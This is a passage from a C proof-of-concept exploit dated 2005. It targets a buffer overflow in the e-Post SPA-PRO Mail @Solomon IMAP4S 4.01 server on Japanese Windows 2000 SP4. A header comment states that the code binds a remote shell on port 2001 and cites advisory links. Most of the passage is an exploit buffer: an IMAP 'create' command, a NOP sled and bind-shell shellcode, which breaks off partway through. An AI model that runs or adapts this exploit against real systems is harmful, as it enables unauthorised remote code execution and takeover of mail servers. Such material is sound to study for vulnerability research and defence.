1 //**************************************************************************
2 // e−Post SPA−PRO Mail @Solomon SPA−IMAP4S 4.01 Service Buffer Overflow
3 // Vulnerability
4 //
5 // Bind Shell POC Exploit for Japanese Win2K SP4
6 // 31 May 2005
7 //
8 // This POC code binds shell on port 2001 of a vulnerable e−Post
9 // SPA−PRO Mail @Solomon IMAP server.
10 //
11 // This POC assumes default mailbox configuration C:\mail\inbox\%USERNAME%
12 // Any changes to the mailbox configuration will cause this POC to
13 // fail due to the length differences.
14 //
15 //
16 // Advisory
17 // http://www.security.org.sg/vuln/spa−promail4.html
18 // http://www.security.org.sg/vuln/spa−promail4−jp.html
19 //
20 //**************************************************************************
21
22 #include <stdio.h>
23 #include <conio.h>
24 #include <winsock2.h>
25 #include <windows.h>
26 #pragma comment (lib,"ws2_32.lib")
27
28
29 unsigned char expBuf[] =
30 "2 create \""
31 "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
32 "\x55\x8B\xEC\x33\xC9\x66\xB9\xE8\x03\x2B\xE1\x32\xC0\x8B\xFC\xF3"
33 "\xAA\xB1\x30\x64\x8B\x01\x8B\x40\x0C\x8B\x70\x1C\xAD\x8B\x70\x08"
34 "\xD9\xEE\xD9\x74\x24\xF4\x5F\x83\xC7\x0C\xEB\x53\x60\x8B\x6C\x24"
35 "\x24\x8B\x75\x3C\x8B\x74\x35\x78\x03\xF5\x8B\x7E\x20\x03\xFD\x8B"
36 "\x4E\x18\x56\x33\xDB\x8B\x37\x03\xF5\x33\xC0\x99\xAC\x85\xC0\x74"
37 "\x07\xC1\xCA\x0D\x03\xD0\xEB\xF4\x3B\x54\x24\x2C\x74\x09\x83\xC7"
38 "\x04\x43\xE2\xE1\x5E\xEB\x16\x5E\x8B\x7E\x24\x03\xFD\x66\x8B\x04"
39 "\x5F\x8B\x7E\x1C\x03\xFD\x8B\x04\x87\x01\x44\x24\x24\x61\xC3\x89"
40 "\x75\xF4\x68\x8E\x4E\x0E\xEC\x56\xFF\xD7\x59\x33\xC0\x66\xB8\x6C"
41 "\x6C\x50\x68\x33\x32\x2E\x64\x68\x77\x73\x32\x5F\x54\xFF\xD1\x8B"
42 "\xF0\x68\xD9\x09\xF5\xAD\x56\xFF\xD7\x5B\x83\xC4\x20\x6A\x01\x6A"
43 "\x02\xFF\xD3\x89\x45\xD0\x68\xA4\x1A\x70\xC7\x56\xFF\xD7\x5B\x33"
44 "\xC0\x50\xB8\xFD\xFF\xF8\x2E\x83\xF0\xFF\x50\x8B\xC4\x6A\x10\x50"
45 "\xFF\x75\xD0\xFF\xD3\x68\xA4\xAD\x2E\xE9\x56\xFF\xD7\x5B\xFF\x75"
46 "\xD0\xFF\xD3\x8B\xCC\x6A\